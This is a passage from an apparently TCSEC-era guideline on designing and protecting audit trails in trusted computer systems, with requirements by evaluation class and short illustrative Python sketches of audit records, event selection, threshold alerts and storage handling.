audit trail, how the audit should be conducted, and what 
protective measures should be accorded to the audit resources. 

Any examples in this document are not to be construed as the only
implementations that will satisfy the Criteria requirement.  The 
examples are merely suggestions of appropriate implementations.  
The recommendations in this document are also not to be construed
as supplementary requirements to the Criteria. The Criteria is 
the only metric against which systems are to be evaluated.   

This guideline is part of an on-going program to provide helpful 
guidance on Criteria issues and the features they address. 

3.   SCOPE 

An important security feature of Criteria classes C2 through A1 
is the ability of the ADP system to audit any or all of the 
activities on the system.  This guideline will discuss auditing 
and the features of audit facilities as they apply to computer 
systems and products that are being built with the intention of 
meeting the requirements of the Criteria. 

4.  CONTROL OBJECTIVES

The Trusted Computer System Evaluation Criteria gives the 
following as the Accountability Control Objective: 

    "Systems that are used to process or handle classified or 
     other sensitive information must assure individual          
     accountability whenever either a mandatory or               
     discretionary security policy is invoked.  Furthermore, to  
     assure accountability the capability must exist for an 
     authorized and competent agent to access and evaluate       
     accountability information by a secure means, within a      
     reasonable amount of time and without undue difficulty."(1) 

The Accountability Control Objective as it relates to auditing 
leads to the following control objective for auditing: 

    "A trusted computer system must provide authorized personnel 
     with the ability to audit any action that can potentially  
     cause access to, generation of, or effect the release 
     of classified or sensitive information.  The audit 
     data will be selectively acquired based on the auditing 
     needs of a particular installation and/or application.      
     However, there must be sufficient granularity in the audit  
     data to support tracing the auditable events to a specific  
     individual (or process) who has taken the actions or on     
     whose behalf the actions were taken."(1)   

5.   OVERVIEW OF AUDITING PRINCIPLES 

Audit trails are used to detect and deter penetration of a
computer system and to reveal usage that identifies misuse.  At
the discretion of the auditor, audit trails may be limited to
specific events or may encompass all of the activities on a
system.  Although not required by the TCSEC, it should be
possible for the target of the audit mechanism to be either a
subject or an object.  That is to say, the audit mechanism should
be capable of monitoring every time John accessed the system as
well as every time the nuclear reactor file was accessed; and
likewise every time John accessed the nuclear reactor file. 

5.1   Purpose of the Audit Mechanism 

The audit mechanism of a computer system has five important
security goals.  First, the audit mechanism must "allow the
review of patterns of access to individual objects, access
histories of specific processes and individuals, and the use of
the various protection mechanisms supported by the system and
their effectiveness."(2)  Second, the audit mechanism must allow
discovery of both users' and outsiders' repeated attempts to
bypass the protection mechanisms.  Third, the audit mechanism
must allow discovery of any use of privileges that may occur when
a user assumes a functionality with privileges greater than his
or her own, i.e., programmer to administrator.  In this case
there may be no bypass of security controls but nevertheless a
violation is made possible.  Fourth, the audit mechanism must act
as a deterrent against perpetrators' habitual attempts to bypass
the system protection mechanisms.  However, to act as a
deterrent, the perpetrator must be aware of the audit mechanism's
existence and its active use to detect any attempts to bypass
system protection mechanisms.  The fifth goal of the audit
mechanism is to supply "an additional form of user assurance that
attempts to bypass the protection mechanisms are recorded and
discovered."(2)  Even if the attempt to bypass the protection
mechanism is successful, the audit trail will still provide
assurance by its ability to aid in assessing the damage done by
the violation, thus improving the system's ability to control the
damage. 

5.2.  Users of the Audit Mechanism 

"The users of the audit mechanism can be divided into two groups. 
The first group consists of the auditor, who is an individual
with administrative duties, who selects the events to be audited
on the system, sets up the audit flags which enable the recording
of those events, and analyzes the trail of audit events."(2)  In
some systems the duties of the auditor may be encompassed in the
duties of the system security administrator.  Also, at the lower
classes, the auditor role may be performed by the system
administrator.  This document will refer to the person
responsible for auditing as the system security administrator,
although it is understood that the auditing guidelines may apply
to system administrators and/or system security administrators
and/or a separate auditor in some ADP systems.   

"The second group of users of the audit mechanism consists of the
system users themselves; this group includes the administrators,
the operators, the system programmers, and all other users.  They
are considered users of the audit mechanism not only because
they, and their programs, generate audit events,"(2) but because
they must understand that the audit mechanism exists and what
impact it has on them.  This is important because otherwise the
user deterrence and user assurance goals of the audit mechanism
cannot be achieved.    

5.3  Aspects of Effective Auditing 

5.3.1.  Identification/Authentication 

 Logging in on a system normally requires that a user enter the 
specified form of identification (e.g., login ID, magnetic strip) 
and a password (or some other mechanism) for authentication. 
Whether this information is valid or invalid, the execution of
the login procedure is an auditable event and the identification
entered may be considered to be auditable information.  It is
recommended that authentication information, such as passwords,
not be forwarded to the audit trail.  In the event that the
identification entered is not recognized as being valid, the
system should also omit this information from the audit trail. 
The reason for this is that a user may have entered a password
when the system expected a login ID.  If the information had been
written to the audit trail, it would compromise the password and
the security of the user. 
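The recommendation above can be sketched as follows; this is a minimal illustration of the idea, with a hypothetical user database and record layout, not an implementation mandated by the guideline:

```python
# Sketch: audit every login attempt, but omit the identification string
# when it is not a recognized login ID, since the user may have typed a
# password into the identification field. All names are illustrative.
from datetime import datetime, timezone

KNOWN_IDS = {"jsmith", "auditor1"}   # hypothetical login ID database
audit_trail = []

def audit_login(entered_id, success, terminal):
    record = {
        "time": datetime.now(timezone.utc).isoformat(),
        "event": "login",
        "success": success,
        "terminal": terminal,
        # Record the entered string only when it is a recognized login
        # ID; otherwise withhold it to avoid compromising a password.
        "user": entered_id if entered_id in KNOWN_IDS else "<unrecognized>",
    }
    audit_trail.append(record)

audit_login("jsmith", True, "tty03")
audit_login("hunter2", False, "tty03")   # possibly a password: not recorded
print(audit_trail[1]["user"])            # <unrecognized>
```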

There are, however, environments where the risk involved in 
recording invalid identification information is reduced.  In
systems that support formatted terminals, the likelihood of
password entry in the identification field is markedly reduced,
hence the recording of identification information would pose no
major threat.  The benefit of recording the identification
information is that break-in attempts would be easier to detect
and identifying the perpetrator would also be assisted.  The
information gathered here may be necessary for any legal
prosecution that may follow a security  violation.    

5.3.2  Administrative 

All systems rated at class C2 or higher shall have audit 
capabilities and personnel designated as responsible for the
audit procedures.  For the C2 and B1 classes, the duties of the
system operators could encompass all functions including those of
the auditor.  Starting at the B2 class, there is a requirement
for the TCB to support separate operator and administrator
functions.  In addition, at the B3 class and above, there is a
requirement to identify the system security administrator
functions.  When one assumes the system security administrator
role on the system, it shall be after taking distinct auditable
action, e.g., login procedure.  When one with the privilege of
assuming the role is on the system, the act of assuming that role
shall also be an auditable event. 

5.3.3   System Design 

The system design should include a mechanism to invoke the audit 
function at the request of the system security administrator.  A 
mechanism should also be included to determine if the event is to
be selected for inclusion as an audit trail entry.  If
pre-selection of events is not implemented, then all auditable
events should be forwarded to the audit trail.  The Criteria
requirement for the administrator to be able to select events
based on user identity and/or object security classification must
still be able to be satisfied.  This requirement can be met by
allowing post-selection of events through the use of queries. 
Whatever reduction tool is used to analyze the audit trail shall
be provided by the vendor.  
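The two selection mechanisms described above can be sketched as follows; the event layout, flag structure, and query interface are illustrative assumptions, not forms required by the Criteria:

```python
# Sketch of pre-selection vs. post-selection of auditable events.
# Pre-selection consults audit flags when the event occurs; post-selection
# records everything and lets the administrator query the trail later.

full_trail = [
    {"user": "john", "object": "reactor-file", "event": "read"},
    {"user": "mary", "object": "payroll",      "event": "write"},
    {"user": "john", "object": "payroll",      "event": "read"},
]

# Pre-selection: only events matching enabled flags reach the trail.
audit_flags = {"users": {"john"}}

def pre_select(event):
    return event["user"] in audit_flags["users"]

pre_trail = [e for e in full_trail if pre_select(e)]

# Post-selection: query the complete trail, here by user identity
# and/or object, the selection bases the Criteria calls for.
def query(trail, user=None, obj=None):
    return [e for e in trail
            if (user is None or e["user"] == user)
            and (obj is None or e["object"] == obj)]

print(len(pre_trail))                         # 2 events involving john
print(len(query(full_trail, obj="payroll")))  # 2 events on the payroll object
```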

5.4   Security of the Audit 

Audit trail software, as well as the audit trail itself, should
be protected by the Trusted Computing Base and should be subject
to strict access controls.  The security requirements of the
audit mechanism are the following: 

(1)  The event recording mechanism shall be part of the TCB and  
     shall be protected from unauthorized modification or        
     circumvention. 

(2)  The audit trail itself shall be protected by the TCB from
     unauthorized access (i.e., only the audit personnel may
     access the audit trail).  The audit trail shall also be     
     protected from unauthorized modification.  

(3)  The audit-event enabling/disabling mechanism shall be part  
     of the TCB and shall remain inaccessible to the unauthorized 
     users.(2)  

At a minimum, the data on the audit trail should be considered to
be sensitive, and the audit trail itself shall be considered to
be as sensitive as the most sensitive data contained in the
system. 

When the medium containing the audit trail is physically removed 
from the ADP system, the medium should be accorded the physical 
protection required for the highest sensitivity level of data 
contained in the system. 

6.   MEETING THE CRITERIA REQUIREMENTS 

This section of the guideline will discuss the audit requirements
in the Criteria and will present a number of additional 
recommendations.  There are four levels of audit requirements. 
The first level is at the C2 Criteria class and the requirements 
continue evolving through the B3 Criteria class.   At each of
these levels, the guideline will list some of the events which
should be auditable, what information should be on the audit
trail, and on what basis events may be selected to be audited. 
All of the requirements will be prefaced by the word "shall," and
any additional recommendations will be prefaced by the word
"should." 

6.1   The C2 Audit Requirement 

6.1.1   Auditable Events 

The following events shall be subject to audit at the C2 class:  

   * Use of identification and authentication mechanisms 

   * Introduction of objects into a user's address space  

   * Deletion of objects from a user's address space 

   * Actions taken by computer operators and system              
     administrators and/or system security administrators    

   * All security-relevant events (as defined in Section 5 of    
     this guideline) 

   * Production of printed output 

6.1.2   Auditable Information 

The following information shall be recorded on the audit trail at
the C2 class:  

   * Date and time of the event 

   * The unique identifier on whose behalf the subject generating 
     the event was operating 

   * Type of event 

   * Success or failure of the event 

   * Origin of the request (e.g., terminal ID) for               
     identification/authentication events 

   * Name of object introduced, accessed, or deleted from a
     user's address space

   * Description of modifications made by the system             
     administrator to the user/system security databases   
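
The record contents listed above can be illustrated as a minimal data 
structure.  This is a sketch only; the field names and sample values 
below are assumptions for illustration, not a layout mandated by the 
Criteria. 

```python
from dataclasses import dataclass, asdict
from datetime import datetime, timezone

@dataclass
class AuditRecord:
    """Hypothetical C2-style audit record; field names are illustrative."""
    timestamp: str    # date and time of the event
    user_id: str      # unique identifier on whose behalf the subject acted
    event_type: str   # type of event, e.g. "login" or "object_delete"
    success: bool     # success or failure of the event
    origin: str       # origin of the request, e.g. a terminal ID
    object_name: str  # object introduced, accessed, or deleted

record = AuditRecord(
    timestamp=datetime(1988, 6, 1, 12, 0, tzinfo=timezone.utc).isoformat(),
    user_id="jdoe",
    event_type="login",
    success=True,
    origin="tty03",
    object_name="",
)
print(asdict(record)["event_type"])  # "login"
```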

6.1.3   Audit Basis 

At the C2 level, the ADP System Administrator shall be able to
audit based on individual identity. 

The ADP System Administrator should also be able to audit based
on object identity. 

6.2   The B1 Audit Requirement 

6.2.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B1 class: 

   * Any override of human-readable output markings (including 
     overwrite of sensitivity label markings and the turning off 
     of labelling capabilities) on paged, hard-copy output 
     devices 

   * Change of designation (single-level to/from multi-level) of 
     any communication channel or I/O device 

   * Change of sensitivity level(s) associated with a 
     single-level communication channel or I/O device 

   * Change of range designation of any multi-level communication 
     channel or I/O device  

6.2.2   Auditable Information 

The Criteria specifically adds the following to the list of 
information that shall be recorded on the audit trail at the B1  
class: 

   * Security level of the object 

The following information should also be recorded on the audit
trail at the B1 class: 

   * Subject sensitivity level  

6.2.3   Audit Basis 

In addition to previous selection criteria, at the B1 level the 
Criteria specifically requires that the ADP System Administrator 
shall be able to audit based on individual identity and/or object
security level. 

6.3   The B2 Audit Requirement 

6.3.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B2 class: 

   * Events that may exercise covert storage channels  

6.3.2   Auditable Information 

No new requirements have been added at the B2 class. 

6.3.3   Audit Basis 

In addition to previous selection criteria, at the B2 level the 
Criteria specifically requires that "the TCB shall be able to
audit the identified events that may be used in the exploitation
of covert storage channels."  The Trusted Computing Base shall
audit covert storage channels that exceed ten bits per second.(1) 

The Trusted Computing Base should also provide the capability to 
audit the use of covert storage mechanisms with bandwidths that
may exceed a rate of one bit in ten seconds.  
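
The two bandwidth figures above can be expressed as a small policy 
check.  This is an illustrative sketch; the function name and the 
returned strings are assumptions, not terminology from the Criteria. 

```python
# B2 covert storage channel guidance: channels exceeding ten bits per
# second shall be audited; the capability to audit should extend down
# to one bit in ten seconds (0.1 bits per second).
MUST_AUDIT_BPS = 10.0
SHOULD_AUDIT_BPS = 0.1

def channel_audit_policy(bits_per_second: float) -> str:
    """Classify a covert storage channel against the B2 audit guidance."""
    if bits_per_second > MUST_AUDIT_BPS:
        return "shall audit"
    if bits_per_second > SHOULD_AUDIT_BPS:
        return "should audit"  # capability to audit should exist
    return "below guidance threshold"

print(channel_audit_policy(25.0))  # shall audit
print(channel_audit_policy(1.0))   # should audit
```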

6.4   The B3 Audit Requirement 

6.4.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B3 class: 

   * Events that may indicate an imminent violation of the 
     system's security policy (e.g., exercise of covert timing 
     channels) 

6.4.2   Auditable Information 

No new requirements have been added at the B3 class. 

6.4.3   Audit Basis 

In addition to previous selection criteria, at the B3 level the  
Criteria specifically requires that "the TCB shall contain a 
mechanism that is able to monitor the occurrence or accumulation
of security auditable events that may indicate an imminent
violation of security policy.  This mechanism shall be able to
immediately notify the system security administrator when
thresholds are exceeded and, if the occurrence or accumulation of
these security-relevant events continues, the system shall take
the least disruptive action to terminate the event."(1)     

Events that would indicate an imminent security violation would 
include events that utilize covert timing channels that may
exceed a rate of ten bits per second and any repeated
unsuccessful login attempts.   

Being able to immediately notify the system security
administrator when thresholds are exceeded means that the
mechanism shall be able to recognize, report, and respond to a
violation of the security policy more rapidly than required at
lower levels of the Criteria, which usually only requires the
System Security Administrator to review an audit trail at some
time after the event.  Notification of the violation "should be
at the same priority as any other TCB message to an operator."(5) 

"If the occurrence or accumulation of these security-relevant
events continues, the system shall take the least disruptive
action to terminate the event."(1)  These actions may include
locking the terminal of the user who is causing the event or
terminating the suspect's process(es).  In general, the least
disruptive action is application dependent and there is no
requirement to demonstrate that the action is the least
disruptive of all possible actions.  Any action which terminates
the event is acceptable, but halting the system should be the
last resort.   
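
The monitoring behavior described above (notify the administrator when 
a threshold is exceeded, then take the least disruptive terminating 
action if the events continue) can be sketched as follows.  The class 
name, window size, and action strings are illustrative assumptions. 

```python
from collections import deque

class ThresholdMonitor:
    """Sketch of a B3-style monitor: count security-relevant events in a
    sliding time window, notify on threshold, then escalate."""

    def __init__(self, threshold: int, window_seconds: float):
        self.threshold = threshold
        self.window = window_seconds
        self.events = deque()   # timestamps of recent events
        self.notified = False

    def record(self, timestamp: float, actions: list) -> None:
        self.events.append(timestamp)
        # Drop events that have aged out of the window.
        while self.events and timestamp - self.events[0] > self.window:
            self.events.popleft()
        if len(self.events) >= self.threshold:
            if not self.notified:
                actions.append("notify system security administrator")
                self.notified = True
            else:
                # Least disruptive action, e.g. lock the offending terminal.
                actions.append("lock terminal")

actions = []
monitor = ThresholdMonitor(threshold=3, window_seconds=60.0)
for t in (0.0, 1.0, 2.0, 3.0):  # repeated failed logins in quick succession
    monitor.record(t, actions)
print(actions)  # notification first, then escalation
```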

6.5   The A1 Audit Requirement 

6.5.1   Auditable Events 

No new requirements have been added at the A1 class. 

6.5.2   Auditable Information 

No new requirements have been added at the A1 class. 

6.5.3   Audit Basis 

No new requirements have been added at the A1 class. 

7.   POSSIBLE IMPLEMENTATION METHODS 

The techniques for implementing the audit requirements will vary 
from system to system depending upon the characteristics of the 
software, firmware, and hardware involved and any optional
features that are to be available.  Technologically advanced
techniques that are available should be used to the best
advantage in the system design to provide the requisite security
as well as cost-effectiveness and performance.  

7.1   Pre/Post Selection of Auditable Events 

There is a requirement at classes C2 and above that all security-
relevant events be auditable.  However, these events need not
always be recorded on the audit trail.  Options that may be 
exercised in selecting which events should be audited include a
pre-selection feature and a post-selection feature.  A system may
choose to implement both options, a pre-selection option only, or
a post-selection option only.  

If a system developer chooses not to implement a general pre/post
selection option, there is still a requirement to allow the 
administrator to selectively audit the actions of specified users
for all Criteria classes.  Starting at the B1 class, the 
administrator shall also be able to audit based on object
security level. 

There should be options to allow selection by either individuals
or groups of users.  For example, the administrator may select
events related to a specified individual or select events related
to individuals included in a specified group.  Also, the
administrator may specify that events related to the audit file
be selected or, at classes B1 and above, that accesses to objects
with a given sensitivity level, such as Top Secret, be selected. 

7.1.1   Pre-Selection 

For each auditable event the TCB should contain a mechanism to 
indicate if the event is to be recorded on the audit trail.  The 
system security administrator or designee shall be the only
person authorized to select the events to be recorded. 
Pre-selection may be by user(s) identity, and at the B1 class and
above, pre-selection may also be possible by object security
level.  Although the system security administrator shall be
authorized to select which events are to be recorded, the system
security administrator should not be able to exclude himself from
being audited. 
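
The pre-selection mechanism described above can be sketched as a set of 
per-event flags controlled by the system security administrator.  The 
event names and the rule that administrators cannot deselect their own 
auditing are modeled here for illustration only. 

```python
# Auditable event types; the names are illustrative, not from the Criteria.
AUDITABLE_EVENTS = frozenset(
    {"login", "object_create", "object_delete", "admin_action"}
)

# Per-event on/off flags set by the system security administrator.
preselected = {event: True for event in AUDITABLE_EVENTS}
preselected["object_create"] = False  # administrator deselects one event type

def should_record(event_type: str) -> bool:
    """Record an event only if it is auditable and pre-selected."""
    return preselected.get(event_type, False)

def should_record_for(user: str, event_type: str,
                      admins: frozenset = frozenset({"ssa"})) -> bool:
    """Administrators cannot exclude themselves: all their auditable
    events are recorded regardless of the pre-selection flags."""
    if user in admins:
        return event_type in AUDITABLE_EVENTS
    return should_record(event_type)
```

A deselected event type is simply never written to the trail for 
ordinary users, while the administrator's own actions remain audited. 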

Although it would not be recommended, the system security  
administrator may have the capability to select that no events be
recorded regardless of the Criteria requirements.  The intention 
here is to provide flexibility.  The purpose of designing audit 
features into a system is not to impose the Criteria on users
that may not want it, but merely to provide the capability to
implement the requirements. 

A disadvantage of pre-selection is that it is very hard to
predict what events may be of security-relevant interest at a
future date.  There is always the possibility that events not
pre-selected could one day become security-relevant, and the
potential loss from not auditing these events would be impossible
to determine. 

The advantage of pre-selection could possibly be better
performance as a result of not auditing all the events on the
system. 

7.1.2   Post-Selection 

If the post-selection option to select only specified events from
an existing audit trail is implemented, again, only authorized 
personnel shall be able to make this selection.  Inclusion of
this option requires that the system should have trusted
facilities (as described in section 9.1) to accept
query/retrieval requests, to expand any compressed data, and to
output the requested data. 

The main advantage of post-selection is that information that may
prove useful in the future is already recorded on an audit trail
and may be queried at any time. 

The disadvantage involved in post-selection could possibly be 
degraded performance due to the writing and storing of what could
possibly be a very large audit trail. 

7.2   Data Compression 

"Since a system that selects all events to be audited may
generate a large amount of data, it may be necessary to encode
the data to conserve space and minimize the processor time
required" to record the audit records.(3)  If the audit trail is
encoded, a complementary mechanism must be included to decode the
data when required.  The decoding of the audit trail may be done
as a preprocess before the audit records are accessed by the
database or as a postprocess after a relevant record has been 
found.  Such decoding is necessary to present the data in an 
understandable form both at the administrator's terminal and on
batch reports.  The cost of compressing the audit trail would be
the time required for the compression and expansion processes. 
The benefit of compressing data is the savings in storage and the
savings in time to write the records to the audit trail.  
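
The compress-on-write, expand-on-read cycle described above can be 
sketched with a generic compression library.  The record format here is 
an assumption for illustration. 

```python
import zlib

# A run of similarly formatted audit records compresses well.
records = "\n".join(
    f"1988-06-01T12:{i:02d} jdoe login success tty03" for i in range(60)
).encode("ascii")

compressed = zlib.compress(records)     # encoded form written to the trail
restored = zlib.decompress(compressed)  # decoded for the administrator

assert restored == records              # the complementary decode mechanism
print(len(compressed), "<", len(records))
```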

7.3   Multiple Audit Trails 

All events included on the audit trail may be written as part of
the same audit trail, but some systems may prefer to have several
distinct audit trails, e.g., one would be for "user" events, one
for "operator" events, and one for "system security
administrator" events.  This would result in several smaller
trails for subsequent analysis.  In some cases, however, it may
be necessary to combine the information from the trails when
questionable events occur in order to obtain a composite of the
sequence of events as they occurred.  In cases where there are
multiple audit trails, it is preferred that there be some
accurate, or at least synchronized, time stamps across the
multiple logs.    

Although the preference for several distinct audit trails may be 
present, it is important to note that it is often more useful
that the TCB be able to present all audit data as one
comprehensive audit trail. 
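
Combining several distinct trails into one composite, timestamp-ordered 
trail can be sketched as a merge of sorted streams.  The trail contents 
below are illustrative assumptions. 

```python
import heapq

# Distinct trails, each already sorted by a synchronized timestamp.
user_trail = [(10, "user: open file"), (40, "user: delete file")]
operator_trail = [(20, "operator: mount tape")]
admin_trail = [(30, "ssa: change audit selection")]

# heapq.merge interleaves the sorted trails into one composite sequence.
composite = list(heapq.merge(user_trail, operator_trail, admin_trail))
print([event for _, event in composite])
```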

7.4   Physical Storage 

A factor to consider in the selection of the medium to be used
for the audit trail would be the expected usage of the system. 
The I/O volume for a system with few users executing few
applications would be quite different from that of a large system
with a multitude of users performing a variety of applications. 
In any case, however, the system should notify the system
operator or administrator when the audit trail medium is
approaching its storage capacity.  Adequate advance notification
to the operator is especially necessary if human intervention is
required.   

If the audit trail storage medium is saturated before it is 
replaced, the operating system shall detect this and take some 
appropriate action such as: 

1.  Notifying the operator that the medium is "full" and action  
    is necessary.  The system should then stop and require       
    rebooting.  Although a valid option, this action creates a 
    severe threat of denial-of-service attacks. 

2.  Storing the current audit records on a temporary medium with 
    the intention of later migration to the normal operational   
    medium, thus allowing auditing to continue.  This temporary  
    storage medium should be afforded the same protection as the 
    regular audit storage medium in order to prevent any attempts 
    to tamper with it. 

3.  Delaying input of new actions and/or slowing down current    
    operations to prevent any action that requires use of the    
    audit mechanism. 

4.  Stopping until the administrative personnel make more space  
    available for writing audit records.    

5.  Stopping auditing entirely as a result of a decision by the  
    system security administrator. 
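
The warning and saturation behavior above can be sketched as a capacity 
check.  The warning threshold, block counts, and action names are 
illustrative assumptions; the point is that the operator is warned in 
advance and that the saturation response is itself audited. 

```python
# Warn the operator when the medium reaches 90% of capacity (assumed value).
WARN_FRACTION = 0.9

def check_capacity(used_blocks: int, total_blocks: int, on_full: str) -> list:
    """Return the notifications/actions triggered by current usage."""
    log = []
    if used_blocks >= total_blocks:
        log.append(f"action: {on_full}")
        # Any action taken in response to overflow shall be audited.
        log.append("audit: recorded saturation response")
    elif used_blocks / total_blocks >= WARN_FRACTION:
        log.append("notify operator: audit medium approaching capacity")
    return log

print(check_capacity(95, 100, on_full="switch to temporary medium"))
print(check_capacity(100, 100, on_full="switch to temporary medium"))
```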

Any action that is taken in response to storage overflow shall be 
audited.  There is, however, a case in which the action taken may
not be audited that deserves mention.  It is possible to have the
system security administrator's decisions embedded in the system 
logic.  Such pre-programmed choices, embedded in the system
logic, may be triggered automatically and this action may not be
audited. 

Still another consideration is the speed at which the medium 
operates.  It should be able to accommodate the "worst case" 
condition such as when there are a large number of users on the 
system and all auditable events are to be recorded.  This worst
case rate should be estimated during the system design phase and
(when possible) suitable hardware should be selected for this
purpose. 

Regardless of how the system handles audit trail overflow, there 
must be a way to archive all of the audit data.  

7.5   Write-Once Device 

For the lower Criteria classes (e.g., C2, B1) the audit trail may
be the major tool used in detecting security compromises. 
Implicit in this is that the audit resources should provide the
maximum protection possible.  One technique that may be employed
to protect the audit trail is to record it on a mechanism
designed to be a write-only device.  Other choices would be to
set the designated device to write-once mode by disabling the 
read mechanism.  This method could prevent an attacker from
erasing or modifying the data already written on the audit trail
because the attacker will not be able to go back and read or find
the data that he or she wishes to modify.   

If a hardware device is available that permits only the writing
of data on a medium, modification of data already recorded would
be quite difficult.  Spurious messages could be written, but to
locate and modify an already recorded message would be difficult. 
Use of a write-once device does not prevent a penetrator from
modifying audit resources in memory, including any buffers, in
the current audit trail. 

If a write-once device is used to record the audit trail, the
medium can later be switched to a compatible read device to allow 
authorized personnel to analyze the information on the audit
trail in order to detect any attempts to penetrate the system. 
If a penetrator modified the audit software to prevent writing
records on the audit trail, the absence of data during an
extended period of time would indicate a possible security
compromise.  The disadvantage of using a write-once device is
that it necessitates a delay before the audit trail is available
for analysis by the administrator.  This may be offset by
allowing the system security administrator to review the audit
trail in real-time by getting copies of all audit records on
their way to the device. 

7.6   Forwarding Audit Data 

If the facilities are available, another method of protecting the
audit trail would be to forward it to a dedicated processor.  The
audit trail should then be more readily available for analysis by
the system security administrator.  

8.  OTHER TOPICS 

8.1   Audit Data Reduction 

Depending upon the amount of activity on a system and the audit 
selection process used, the audit trail size may vary.  It is a
safe assumption though, that the audit trail would grow to sizes
that would necessitate some form of audit data reduction.  The
data reduction tool would most likely be a batch program that
would interface to the system security administrator.  This batch
run could be a combination of database query language and a
report generator with the input being a standardized audit file. 
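
Such a batch reduction run can be sketched as a simple query over a 
standardized audit file.  The record fields and the query interface are 
assumptions for illustration, standing in for a database query language 
and report generator. 

```python
# A standardized audit file, here modeled as a list of records.
audit_file = [
    {"time": "12:00", "user": "jdoe", "event": "login", "success": False},
    {"time": "12:01", "user": "jdoe", "event": "login", "success": False},
    {"time": "12:05", "user": "asmith", "event": "object_create", "success": True},
]

def reduce_trail(records, **criteria):
    """Select the records matching every given field, query-style."""
    return [r for r in records
            if all(r.get(k) == v for k, v in criteria.items())]

# Example reduction: all failed login attempts.
failed_logins = reduce_trail(audit_file, event="login", success=False)
print(len(failed_logins))  # 2
```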

Although they are not necessarily part of the TCB, the audit 
reduction tools should be maintained under the same configuration
control system as the remainder of the system. 

8.2  Availability of Audit Data 

In standard data processing, audit information is recorded as it 
occurs.  Although most information is not required to be
immediately available for real-time analysis, the system security
administrator should have the capability to retrieve audit
information within minutes of its recording. 

For events which do require immediate attention, at the B3 class
and above, an alert shall be sent out to the system security 
administrator.  In systems that store the audit trail in a
buffer, the system security administrator should have the
capability to cause the buffer to be written out.  Regarding
real-time alarms, where they are sent is system dependent.   

8.3  Audit Data Retention 

The exact period of time required for retaining the audit trail  
is site dependent and should be documented in the site's
operating procedures manual.  When trying to arrive at the
optimum time for audit trail retention, any time restrictions on
the storage medium should be considered.  The storage medium used
must be able to reliably retain the audit data for the amount of
time required by the site.     

The audit trail should be reviewed at least once a week.  It is
very possible that once a week may be too long to wait to review 
the audit trail.  Depending on the amount of audit data expected 
by the system, this parameter should be adjusted accordingly. 
The recommended time in between audit trail reviews should be
documented in the Trusted Facility Manual.      

8.4  Testing 

The audit resources, along with all other resources protected by
the TCB, have increasing assurance requirements at each higher
Criteria class.  For the lower classes, an audit trail would be a
major factor in detecting penetration attempts.  Unfortunately,
at these lower classes, the audit resources are more susceptible
to penetration and corruption.  "The TCB must provide some
assurance that the data will still be there when the
administrator tries to use it."(3)  The testing requirement
recognizes the vulnerability of the audit trail, and starting
with the C2 class, shall include a search for obvious flaws that
would corrupt or destroy the audit trail.  If the audit trail is
corrupted or destroyed, the existence of such flaws indicates
that the system can be penetrated.  Testing should also be
performed to uncover any ways of circumventing the audit
mechanisms.  The "flaws found in testing may be neutralized in 
any of a number of ways.  One way available to the system
designer is to audit all uses of the mechanism in which the flaw
is found and to log such events."(3)  An attempt should be made
to remove the flaw.   

At class B2 and above, it is required that all detected flaws
shall be corrected or else a lower rating will be given.  If
during testing the audit trail appears valid, analysis of this
data can verify that it does or does not accurately reflect the
events that should be included on the audit trail.  Even though
system assurances may increase at the higher classes, the audit
trail is still an effective tool during the testing phase as well
as operationally in detecting actual or potential security
compromises. 

8.5  Documentation  

Starting at the C2 class, documentation concerning the audit 
requirements shall be contained in the Trusted Facility Manual.  
The Trusted Facility Manual shall explain the procedures to
record, examine, and maintain audit files.  It shall detail the
audit record structure for each type of audit event, and should
include what each field is and what the size of the field is. 

The Trusted Facility Manual shall also include a complete 
description of the audit mechanism interface, how it should be
used, its default settings, cautions about the trade-offs
involved in using various configurations and capabilities, and
how to set up and run the system such that the audit data is 
afforded appropriate protection. 

If audit events can be pre- or post-selected, the manual should
also describe the tools and mechanisms available and how they are
to be used. 

8.6  Unavoidable Security Risks 

Certain risks are inherent in the audit process simply because
there is no way to prevent some events from ever occurring. 
Because auditing involves unpredictable factors (e.g., human
error, natural events), the audit mechanism may never be one
hundred percent reliable.  Preventive measures may be taken to
minimize the likelihood of any of these factors adversely
affecting the security provided by the audit mechanism, but no
audit mechanism will ever be risk free. 

8.6.1   Auditing Administrators/Insider Threat 

Even with auditing mechanisms in place to detect and deter
security violations, the threat of the perpetrator actually being
the system security administrator or someone involved with the
system security design will always be present.  It is quite
possible that the system security administrator of a secure
system could stop the auditing of activities while entering the
system and corrupting files for personal benefit.  These
authorized personnel, who may also have access to identification
and authentication information, could also choose to enter the
system disguised as another user in order to commit crimes under
a false identity.  

Management should be aware of this risk and should be certain to 
exercise discretion when selecting the system security 
administrator.  The person who is to be selected for a trusted 
position, such as the system security administrator, should be 
subject to a background check before being granted the privileges
that could one day be used against the employer.   

The system security administrator could also be watched to ensure
that there are no unexplained variances in normal duties.  Any 
deviation from the norm of operations may indicate that a
violation of security has occurred or is about to occur. 

An additional security measure to control this insider threat is
to ensure that the system administrator and the person
responsible for the audit are two different people.  "The
separation of the auditor's functions, databases, and access
privileges from those of the system administrator is an important
application of the separation of privilege and least privilege 
principles.  Should such a separation not be performed, and
should the administrator be allowed to undertake auditor
functions or vice-versa, the entire security function would
become the responsibility of a single, unaccountable
individual."(2) 

Another alternative may be to employ separate auditor roles. 
Such a situation may give one person the authority to turn off
the audit mechanism, while another person may have the authority
to turn it back on.  In this case no individual would be able to
turn off the audit mechanism, compromise the system, and then
turn it back on. 

8.6.2   Data Loss 

Although the audit software and hardware are reliable security  
mechanisms, they are not infallible.  They, like the rest of the 
system, are dependent upon constant supplies of power and are  
readily subject to interruption due to mechanical or power
failures.  Their failure can cause the loss or destruction of
valuable audit data.  The system security administrator should be
aware of this risk and should establish some procedure that would
ensure that the audit trail is preserved somewhere.  The system
security administrator should duplicate the audit trail on a
removable medium at certain points in time to minimize the data
loss in the event of a system failure.  The Trusted Facility
Manual should include what the possibilities and nature of loss
exposure are, and how the data may be recovered in the event that
a catastrophe does occur.  

If a mechanical or power failure occurs, the system security 
administrator should ensure that audit mechanisms still function 
properly after system recovery.  For example, any auditing
mechanism options pre-selected before the system malfunction must
still be the ones in operation after the system recovery.   

9.  AUDIT SUMMARY 

For classes C2 and above, it is required that the TCB "be able to
create, maintain, and protect from modification or unauthorized 
access or destruction an audit trail of accesses to the objects
it protects."(1)  The audit trail plays a key role in performing
damage assessment in the case of a corrupted system.   

The audit trail shall keep track of all security-relevant events 
such as the use of identification and authentication mechanisms, 
introduction of objects into a user's address space, deletion of 
